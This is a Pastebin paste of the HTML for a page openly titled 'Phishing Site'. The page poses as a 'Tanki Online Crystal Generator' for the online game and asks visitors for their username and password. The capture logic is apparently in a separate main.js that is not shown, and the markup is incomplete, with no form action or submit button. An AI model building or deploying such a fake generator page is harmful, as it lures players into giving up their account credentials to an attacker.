Guest User

phishingsite

a guest
Mar 27th, 2018
47
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 0.94 KB | None | 0 0
  1. <!DOCTYPE html>
  2.  
  3. <html>
  4.  
  5. <head>
  6. <title>Phishing Site</title>
  7. <style>
  8.   #head {
  9.     font-family: IBM Plex Sans;
  10.     text-align: center;
  11.     color: white;
  12.     padding: 1%;
  13.   }
  14.   body {
  15.     background-image: url(http://tankionline.com/en/wp-content/uploads/2014/12/1920x1200.jpg);
  16.   }
  17.   div.transbox {
  18.     background-color: #000000;
  19.     opacity: 0.6;
  20.     height: 30vh;
  21.   }
  22. </style>
  23. <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans" rel="stylesheet">
  24. </head>
  25.  
  26. <body>
  27. <div class="transbox">
  28. <div id="head">
  29.   <h1>Tanki Online <br>Crystal Generator</h1>
  30.   <h3>by bachoo_3000</h3>
  31. </div>
  32. </div>
  33. <div id="main">
  34.   <form>
  35.     <p>
  36.       Username: <br>
  37.       <input id="username" placeholder="username"></input>
  38.       <br>
  39.       Password: <br>
  40.       <input id="password" placeholder="password"></input>
  41.     </p>
  42.   </form>
  43. <div id="footer"></div>
  44. </div>
  45. <script src="main.js" type=text/css>
  46. </body>
  47.  
  48. </html>
Add Comment
Please, Sign In to add comment